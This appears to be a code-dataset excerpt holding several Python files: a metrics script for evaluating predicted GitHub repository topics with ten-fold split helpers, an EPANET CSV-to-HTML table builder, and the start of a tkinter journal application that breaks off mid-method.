stemming_topics(predicted,actual):\r\n stemmer = PorterStemmer()\r\n stemmed_pred=[]\r\n stemmed_act=[]\r\n for p in predicted:\r\n stemmed_pred.append(stemmer.stem(p))\r\n for a in actual:\r\n stemmed_act.append(stemmer.stem(a))\r\n return stemmed_pred , stemmed_act\r\n\r\n\r\ndef success_rate(predicted, actual, n):\r\n if actual:\r\n match = [value for value in predicted if value in actual]\r\n if len(match)>=n:\r\n return 1\r\n else:\r\n return 0\r\n else:\r\n return -1\r\n\r\n\r\ndef precision(predicted,actual):\r\n if actual:\r\n true_p = len([value for value in predicted if value in actual])\r\n false_p= len([value for value in predicted if value not in actual])\r\n return (true_p / (true_p + false_p))*100\r\n else:\r\n return -1\r\n\r\n\r\ndef recall(predicted,actual):\r\n if actual:\r\n true_p = len([value for value in predicted if value in actual])\r\n false_n=len([value for value in actual if value not in predicted])\r\n return (true_p/(true_p + false_n))*100\r\n else:\r\n return -1\r\n\r\n\r\ndef top_rank(predicted,actual):\r\n top = predicted.pop(0)\r\n if top in actual:\r\n predicted.insert(0, top)\r\n return 1\r\n else:\r\n return 0\r\n\r\n\r\n\r\n\r\n\r\ndef remove_dashes(actual):\r\n result=[]\r\n for topic in actual:\r\n if topic.find(\"-\")!=-1:\r\n result.append(topic.replace(\"-\",\"\"))\r\n else:\r\n result.append(topic)\r\n return result\r\n\r\n\r\n\r\n\r\ndef find_repo_names(file_in, file_to_check, file_out):\r\n begin=open(file_in,\"r\", encoding=\"utf-8\", errors=\"ignore\").readlines()\r\n to_check=open(file_to_check,\"r\", encoding=\"utf-8\", errors=\"ignore\").readlines()\r\n out=open(file_out,\"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n\r\n list_begin=[]\r\n list_check=[]\r\n for line1,line2 in zip(begin,to_check):\r\n if line1.strip().find(\"/\")!=-1 and line2.strip().find(\"/\") != -1:\r\n if line1.strip() != line2.strip():\r\n out.write(line1.strip()+\"\\n\")\r\n\r\ndef add_lang(guess_list, repo_name, list_predicted):\r\n for elem in guess_list:\r\n if elem[0] == repo_name:\r\n if elem[2] > str(10):\r\n list_predicted.pop()\r\n list_predicted.append(elem[1])\r\n\r\n return list_predicted\r\n\r\n\r\n\r\ndef preprocess_names(test_folder, test_file):\r\n\r\n out=open(test_file,\"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n for topic in os.listdir(test_folder):\r\n out.write(topic + \"\\n\")\r\n for file in os.listdir(test_folder+\"\\\\\"+topic):\r\n file=file.replace(\".txt\",\"\")\r\n out.write(file.replace(\",\",\"/\")+\"\\n\")\r\n # else:\r\n # pos=file.find(\"-\",0,10)\r\n # list_f=list(file)\r\n # list_f[pos]=\"/\"\r\n # out.write(\"\".join(list_f)+\"\\n\")\r\n\r\n\r\ndef remove_not_featured(file_topic, actual):\r\n topics=open(file_topic,\"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n discarded_topic=open(\"discarded_topic.txt\",\"a+\", encoding=\"utf-8\", errors=\"ignore\")\r\n list_featured=[]\r\n for t in topics:\r\n list_featured.append(t.strip())\r\n featured=[value for value in actual if value in list_featured]\r\n not_featured=[value for value in actual if value not in list_featured]\r\n for nf in not_featured:\r\n discarded_topic.write(nf+\"\\n\")\r\n\r\n return featured\r\n\r\n\r\ndef compute_metrics(act_topics,pred_topics, out_results,repo):\r\n out_results.write(repo + \",\")\r\n if act_topics:\r\n act_topics = remove_not_featured(\"already_downloaded.txt\", act_topics)\r\n\r\n ##add language\r\n guess_list = extractNames(\"results1.txt\")\r\n pred_topics = add_lang(guess_list, repo.strip(), pred_topics)\r\n # pred_topics=pred_topics[:len(act_topics)]\r\n out_results.write(\"actual topics [\" + ','.join([str(elem) for elem in act_topics]) + \"]\" + \"\\n\")\r\n out_results.write(\"predicted topics [\" + ','.join([str(elem) for elem in pred_topics]) + \"]\" + \"\\n\")\r\n pred_topics = remove_dashes(pred_topics)\r\n act_topics = remove_dashes(act_topics)\r\n pred_topics, act_topics = stemming_topics(pred_topics, act_topics)\r\n\r\n for x in range(1, 6):\r\n ##act_topics = composed_word_h(act_topics)\r\n out_results.write(str(success_rate(pred_topics, act_topics, x)) + \",\")\r\n out_results.write(str(precision(pred_topics, act_topics)) + \",\")\r\n # avg_precision += precision(pred_topics, act_topics)\r\n out_results.write(str(recall(pred_topics, act_topics)) + \",\")\r\n # avg_recall+=recall(pred_topics,act_topics)\r\n # out_results.write(str(pred_topics[0:1]))\r\n out_results.write(str(top_rank(pred_topics, act_topics)) + \"\\n\")\r\n # total_top += top_rank(pred_topics,act_topics)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef calculate_metrics(test_dataset, out_results, out_results2, out_results3, actual, predicted,flag):\r\n # avg_precision=0.0\r\n # avg_recall=0.0\r\n # total_top=0\r\n # test_avg_precision=0.0\r\n # test_avg_recall = 0.0\r\n # test_avg_top_rank = 0\r\n\r\n\r\n for repo in test_dataset:\r\n if repo.strip().find(\"/\") != -1:\r\n ##get user topics\r\n act_topics, five_topics, two_topics, eight_topics = get_topics(actual, key_actual=str(repo).strip(), dict_predicted=predicted,\r\n key_predicted= str(repo).strip().replace(\"/\",\",\") + \".txt\")\r\n compute_metrics(act_topics, five_topics,out_results,repo)\r\n compute_metrics(act_topics, two_topics, out_results2, repo)\r\n compute_metrics(act_topics, eight_topics, out_results3, repo)\r\n\r\n # out_results.write(repo+\",\")\r\n # if act_topics:\r\n # act_topics = remove_not_featured(\"already_downloaded.txt\", act_topics)\r\n # if flag:\r\n # append_new_topics(\"discarded_topic.txt\", pred_topics)\r\n #\r\n #\r\n # ##add language\r\n # guess_list=extractNames(\"results.txt\")\r\n # pred_topics = add_lang(guess_list, repo.strip(), pred_topics)\r\n # #pred_topics=pred_topics[:len(act_topics)]\r\n # #out_results.write(\"actual topics [\" + ','.join([str(elem) for elem in act_topics]) + \"]\" + \"\\n\")\r\n # #out_results.write(\"predicted topics [\" + ','.join([str(elem) for elem in pred_topics]) + \"]\" + \"\\n\")\r\n # pred_topics=remove_dashes(pred_topics)\r\n # act_topics=remove_dashes(act_topics)\r\n # pred_topics, act_topics = stemming_topics(pred_topics, act_topics)\r\n #\r\n # for x in range(1,6):\r\n # ##act_topics = composed_word_h(act_topics)\r\n # out_results.write(str(success_rate(pred_topics, act_topics,x)) + \",\")\r\n # out_results.write(str(precision(pred_topics, act_topics)) + \",\")\r\n # #avg_precision += precision(pred_topics, act_topics)\r\n # out_results.write(str(recall(pred_topics, act_topics)) + \",\")\r\n # #avg_recall+=recall(pred_topics,act_topics)\r\n # #out_results.write(str(pred_topics[0:1]))\r\n # out_results.write(str(top_rank(pred_topics,act_topics)) + \"\\n\")\r\n # #total_top += top_rank(pred_topics,act_topics)\r\n\r\n else:\r\n #out_results.write(\"------------------------------\" + \"\\n\")\r\n #out_results.write(repo)\r\n continue\r\n # if len(actual)> 0:\r\n # # out_results.write(\"avg precision: \" + str(avg_precision/ len(actual))+\"\\n\")\r\n # # out_results.write(\"avg recall: \" + str(avg_recall / len(actual)) + \"\\n\")\r\n # # out_results.write(\"top rank ratio: \" + str(total_top * len(actual)) + \"\\n\")\r\n #\r\n # test_avg_precision += avg_precision\r\n # test_avg_recall += avg_recall\r\n # test_avg_top_rank += total_top\r\n\r\n\r\n\r\n\r\n\r\ndef ten_folder(path_train,path_dest,cut,copy):\r\n\r\n i=0\r\n\r\n for file in sorted(os.listdir(path_train), key=lambda v: v.upper()):\r\n print(file)\r\n i = i + 1\r\n if not copy:\r\n shutil.move(path_train+file, path_dest+file)\r\n else:\r\n copyfile(path_train+file, path_dest+file)\r\n if i == cut:\r\n i = 0\r\n break\r\n continue\r\n\r\n\r\n# def count_no_fet_topics(file):\r\n# disc=open(file,\"r\",encoding=\"utf-8\",errors=\"ignore\")\r\n# #print(Counter(disc.readlines()))\r\n# c= collections.Counter(disc.readlines())\r\n# for key, value in sorted(c.items(), key=operator.itemgetter(1),reverse=True):\r\n# print(key.strip()+ \": \"+ str(value))\r\n\r\n\r\n# def sort_repos(file_in, file_out):\r\n# begin=open(file_in,\"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n# out=open(file_out,\"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n# for repo in sorted(begin.readlines(), key=lambda v: v.upper()):\r\n# out.write(repo.strip()+\"\\n\")\r\n\r\n\r\n# def move_test_set(file_in, file_out):\r\n# begin = open(file_in, \"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n# out = open(file_out, \"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n# temp= open(\"temp.txt\", \"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n# n=10\r\n# # i=0\r\n# # temp_list=[]\r\n# # begin.seek(0)\r\n# # for repo in begin.readlines():\r\n# # #out.write(repo.strip()+\"\\n\")\r\n# #\r\n# # temp_list.append(repo.strip())\r\n# # i=i+1\r\n# # if i == 10:\r\n# # for s in temp_list:\r\n# # out.write(s+\"\\n\")\r\n# #\r\n# # for left in [value for value in temp_list if value not in begin.read().splitlines()]:\r\n# # temp.write(left+\"\\n\")\r\n# with open(file_in) as f:\r\n# mylist = f.read().splitlines()\r\n#\r\n# newlist = mylist[:n]\r\n# for elem in newlist:\r\n# out.write(elem+\"\\n\")\r\n#\r\n# #os.remove(file_in)\r\n#\r\n# thefile = open(file_in, 'w')\r\n#\r\n# del mylist[:n]\r\n#\r\n# for item in mylist:\r\n# thefile.write(\"%s\\n\" % item)\r\n\r\n\r\ndef append_new_topics(file_topics,predicted):\r\n disc = open(file_topics, \"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n for t in disc:\r\n predicted.append(t.strip())\r\n return predicted\r\n### copy=True mv=False\r\n\r\n\r\n#actual=[\"phoenix\",\"java\",\"big-data\",\"database\",\"sql\"]\r\n#remove_not_fetured(\"already_downloaded.txt\",actual)\r\n\r\n\r\n# def tests_for_ten_folder():\r\n# sort_repos(\"discarded_topic.txt\",\"ordered_list.txt\")\r\n# for x in range(1,11):\r\n# print(x)\r\n# move_test_set(\"ordered_list.txt\",\"C:\\\\Users\\\\claudio\\\\Desktop\\\\test_repo\\\\monitoring\\\\test\"+str(x)+\".txt\")\r\n# #count_no_fet_topics(\"discarded_topic.txt\")\r\n\r\n\r\n\r\n\r\n\r\ndef ultimate_ten_folder():\r\n### ten folder validation\r\n path1=\"C:\\\\Users\\\\claudio\\\\Desktop\\\\projects_new_dataset\\\\\"\r\n path2=\"C:\\\\Users\\\\claudio\\\\Desktop\\\\half_50\"\r\n #\r\n for t in os.listdir(path1):\r\n ##group1\r\n ten_folder(path1 + t + \"\\\\\", path2 + \"\\\\root\\\\\"+t+\"\\\\\", 50, True)\r\n ten_folder(path2+\"\\\\root\\\\\"+t+\"\\\\\",path2+\"\\\\test1\\\\\"+t+\"\\\\\",5, False)\r\n ten_folder(path2 + \"\\\\root\\\\\" + t + \"\\\\\", path2 + \"\\\\train1\\\\\" + t + \"\\\\\", 45, True)\r\n ten_folder(path2+\"\\\\train1\\\\\"+t+\"\\\\\",path2+\"\\\\temp\\\\\"+t+\"\\\\\",45, True)\r\n # ##group2\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test2\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train2\\\\\" + t + \"\\\\\",40 , True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train2\\\\\" + t + \"\\\\\", 5, True)\r\n # #group3\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test3\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train3\\\\\" + t + \"\\\\\", 35, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train3\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train3\\\\\" + t + \"\\\\\", 5, True)\r\n # ##group4\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test4\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train4\\\\\" + t + \"\\\\\", 30, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train4\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train4\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train4\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n # ##group5\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test5\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 25, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 5, True)\r\n #\r\n # ##group6\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test6\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 20, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n # ##group7\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test7\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 15, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test6\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n # ##group8\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test8\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 10, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test6\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\",5, True)\r\n ten_folder(path2 + \"\\\\test7\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n # ##group9\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test9\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test6\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test7\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test8\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n # ##group10\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test10\\\\\" + t + \"\\\\\", 5, False)\r\n #ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 0, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test6\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test7\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test8\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test9\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n\r\ndef move_repos(path_train,path_dest):\r\n\r\n for folder in os.listdir(path_train):\r\n for file in os.listdir(path_train+\"//\"+folder):\r\n copy_tree(path_train+\"\\\\\"+folder+\"\\\\\"+file, path_dest+\"\\\\\"+file)\r\n\r\n\r\ndef extractNames(file_lang):\r\n\r\n f = open(file_lang, \"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n results = []\r\n result = []\r\n guessLangResults = f.readlines()\r\n for elem in guessLangResults:\r\n if(\"/\" in elem):\r\n result = []\r\n result.append(elem.rstrip())\r\n if(\"({\" in elem):\r\n index = elem.find(\"'\")+1\r\n findex = elem.find(\"'\", index)\r\n lang = elem[index:findex]\r\n\r\n if lang==\"C++\":\r\n lang=\"cpp\"\r\n elif lang==\"C#\":\r\n lang=\"csharp\"\r\n result.append(lang.lower())\r\n\r\n\r\n index = elem.find(\":\", findex)+2\r\n findex = elem.find(\",\", index)\r\n occor = elem[index:findex]\r\n result.append(occor)\r\n results.append(result)\r\n\r\n print(results)\r\n return results\r\n\r\n\r\n\r\ndef split_metrics(file_in, file_precision, file_recall, file_top):\r\n f=open(file_in, \"r\")\r\n out_precision=open(file_precision,\"w\")\r\n\r\n for line in f:\r\n if line.find(\"no\") != -1:\r\n out_precision.write(line.strip() + \"\\n\")\r\n\r\n\r\n\r\n\r\ndef create_topics_folder(root,file_topic):\r\n list_folders= open(file_topic,\"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n print(root)\r\n list_topic=\"C:\\\\Users\\\\claudio\\\\Desktop\\\\projects_new_dataset\\\\\"\r\n for folder in os.listdir(root):\r\n print(folder)\r\n for f in os.listdir(list_topic):\r\n\r\n try:\r\n #print(\"no\")\r\n os.mkdir(os.path.join(root,folder,str(f).strip()))\r\n except:\r\n print(\"already created\")\r\n# begin=\"C:\\\\Users\\\\claudio\\\\Desktop\\\\projects_100_readme_ConfB\\\\\"\r\n# begin2=\"C:\\\\Users\\claudio\\\\Desktop\\\\ten_folder_135\\\\\"\r\n# end=\"C:\\\\Users\\claudio\\\\Desktop\\\\ten_folder_135\\\\\"\r\n#\r\n# for topic in os.listdir(begin):\r\n# for x in range(1, 11):\r\n# print(x)\r\n# copy_tree(begin, end+topic+\"\\\\train\"+str(x)+\"\\\\\")\r\n\r\n#split_metrics(\"C:\\\\Users\\\\claudio\\\\Desktop\\\\topics_134.txt\",\"left.txt\", \"recall_test2.csv\", \"top_test2.csv\")\r\n# for x in range(1,11):\r\n# print(x)\r\n# preprocess_names(\"C:\\\\Users\\\\claudio\\\\Desktop\\\\half_50\\\\test\"+str(x)+\"\\\\\",\"half_\"+str(x)+\".txt\")\r\n# #move_repos(\"D:\\\\crawledRepository\",\"D:\\\\MSR_repo\")\r\n#ultimate_ten_folder()\r\n\r\n# list_predicted = [\"3d\", \"unity\", \"game-engine\", \"aws\"]\r\n# guess_langs=[[\"usr/repo\",\"cpp\",49], [\"another/repo\", \"java\", 30]]\r\n# repo_to_guess=\"usr/repo\"\r\n# print(add_lang(guess_langs, repo_to_guess, list_predicted))\r\n#create_topics_folder(\"C:/Users/claudio/Desktop/half_50\", \"10_folder.txt\")\r\n#extractNames(\"results.txt\")","sub_path":"MNB_code/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":20576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"470666934","text":"import os\nimport csv\n\n__version__ = '0.2.1'\n\nHTML_PATH = '.\\\\nodes.html'\nCSV_FILES = '.\\\\EPANET_exports\\\\PMLD_nodes.xlsx'\n\nSP_INC = 2 #no of spaces to increment by\n\ndef create_row(row_data, **kwargs):\n sp = ' ' * kwargs.get('line_space', 0) #leading spaces\n output = sp + '\\n'\n sp += SP_INC * ' ' #increase lead spacing\n\n if kwargs.get('is_header', False):\n for item in row_data:\n output += sp + '' + item + '\\n'\n else:\n first_col = row_data[0].split(' ', 1) #first word of first column is \n output += sp + '' + first_col[0] + ' ' + first_col[1] + '\\n'\n for item in row_data[1:]:\n output += sp + '' + item + '\\n'\n \n sp = sp[:-SP_INC] #dec lead spacing\n return output + sp + '\\n'\n\n\ndef create_table(table_data, **kwargs): #create table from list of lists\n border = str(kwargs.get('border', 0))\n cellspacing = str(kwargs.get('cellspacing', 0))\n cellpadding = str(kwargs.get('cellpadding', 0))\n sp = ' ' * kwargs.get('line_space', 0) #loading spaces\n output = sp + '\\n'\n sp += SP_INC * ' ' #increase lead spacing\n\n output += create_row(table_data[0], line_space = len(sp), is_header = True) #first row is a header\n for row_data in table_data[1:]: #remaining rows are data\n output += create_row(row_data, line_space = len(sp))\n\n sp = sp[:-SP_INC] #decrease lead spacing\n return output + sp + '
    \\n'\n\n\ndef insert_csv (html_path, csv_paths):\n html_orig = open(html_path)\n html_halves = html_orig.read().split('')\n sp = (len(html_halves[0]) - len(html_halves[0].rstrip(' '))) #number of spaces before ending table tag\n\n new_tables = ''\n for path in csv_paths:\n print('Building table for ' + path)\n file = open(path, 'r')\n csv_data = list(csv.reader(file, delimiter=','))\n new_tables += create_table(csv_data, line_space = sp + 2)\n\n print('Inserting tables into copy of ' + html_path)\n output_html = html_halves[0].rstrip(' ') + new_tables + (sp * ' ') + '' + html_halves[1]\n output_path = os.path.dirname(html_path) + '\\\\output.htm'\n print('Saving result to ' + output_path)\n output_file = open(output_path, 'w')\n output_file.write(output_html)\n\nif __name__ == \"__main__\": insert_csv(HTML_PATH, CSV_FILES)","sub_path":"Epanet Files/EPANET_csv_file_reader.py","file_name":"EPANET_csv_file_reader.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"603823526","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jul 9 16:02:20 2016\r\n\r\n@author: Kozmik\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter.ttk import *\r\nimport tkinter.messagebox as messagebox\r\nfrom datetime import datetime\r\nfrom typing import TypeVar, Generic\r\n\r\nEntryFrame = TypeVar('EntryFrame')\r\n\r\nclass EntryFrame:\r\n def __init__(self, master):\r\n self.main = Frame(master)\r\n# style = ttk.Style()\r\n# style.configure()\r\n self.scrollbar = Scrollbar(self.main)\r\n self.body_box = Text(self.main, yscrollcommand=self.scrollbar.set, wrap=WORD)\r\n self.scrollbar.config(command=self.body_box.yview)\r\n self.body_box.grid(row=4, column=2, rowspan=11, columnspan=29, sticky = NSEW, pady=3)\r\n self.scrollbar.grid(row=4, column=32, rowspan=11, sticky=NS)\r\n \r\n self.tagslabel = Label(self.main, text=\"Tags:\", width=10, anchor=CENTER)\r\n self.tagslabel.grid(row=16, column=8)\r\n self.tags_box = Text(self.main, height=1)\r\n self.tags_box.grid(row=16, column=10, columnspan=14, sticky=EW)\r\n \r\n self.parentlabel = Label(self.main, text=\"Parent Entry:\", width=15, anchor =CENTER).grid(row=17, column=8)\r\n self.parent_box = Text(self.main, height=1)\r\n self.parent_box.grid(row=17, column=10, columnspan=8)\r\n \r\n \r\n def update(self, body=None, tags=None, parent=None):\r\n self.body_box.delete(\"1.0\", END)\r\n self.tags_box.delete(\"1.0\", END)\r\n self.parent_box.delete(\"1.0\", END)\r\n if body:\r\n self.body_box.insert(CURRENT, body)\r\n if tags:\r\n i = 1\r\n sorted_tags = sorted(tags)\r\n self.tags_box.insert(CURRENT, sorted_tags[0])\r\n while i < len(sorted_tags):\r\n self.tags_box.insert(CURRENT, ', ' + sorted_tags[i])\r\n i+=1\r\n if parent:\r\n self.parent_box.insert(CURRENT, parent)\r\n def getBodyBoxContents(self):\r\n return self.body_box.get(\"1.0\", END) \r\n def getTagsBoxContents(self):\r\n return self.tags_box.get(\"1.0\", END) \r\n def getParentBoxContents(self):\r\n if self.parent_box.get(\"1.0\", END):\r\n return self.parent_box.get(\"1.0\", END)\r\n else:\r\n return None\r\n \r\n \r\n def CreateEntryFrame(self):\r\n return self.main\r\n \r\nclass OptionsFrame:\r\n def __init__(self, program, master, date, entry, journal):\r\n self.main = Frame(master)\r\n self.main_win = program\r\n self.master = master\r\n self.entry_obj = entry\r\n self.journal_obj = journal \r\n self.date_obj = date\r\n self.win = None\r\n \r\n self.SAVE = Button(self.main, text=\"Save\", command=self.Save).grid(row=0, column=0, columnspan=2)\r\n self.LINK = Button(self.main, text=\"Create Linked Entry\", command=self.NewLink).grid(row=0, column=2, columnspan=2, sticky=EW)\r\n self.NEW = Button(self.main, text=\"New Entry\", command=self.NewEntry).grid(row=0, column=4, columnspan=2)\r\n self.QUIT = Button(self.main, text=\"Quit\", command=self.Quit).grid(row=1, column=0, columnspan=2)\r\n self.LINKS = Button(self.main, text=\"Display Linked Entries\", command=self.DisplayLinks).grid(row=1, column=2, columnspan=2)\r\n self.DELETE = Button(self.main, text=\"Delete\", command=self.Delete).grid(row=1, column=4)\r\n \r\n \r\n def Save(self):\r\n b = self.entry_obj.getBodyBoxContents()\r\n t = self.entry_obj.getTagsBoxContents()\r\n p = self.entry_obj.getParentBoxContents()\r\n d = 0\r\n if self.date_obj.get():\r\n d = self.date_obj.getDateProgramFormat()\r\n else:\r\n self.date_obj.updateDateDisplay()\r\n d = self.date_obj.getDateProgramFormat()\r\n self.journal_obj.add(d, b, t, p)\r\n if self.win:\r\n 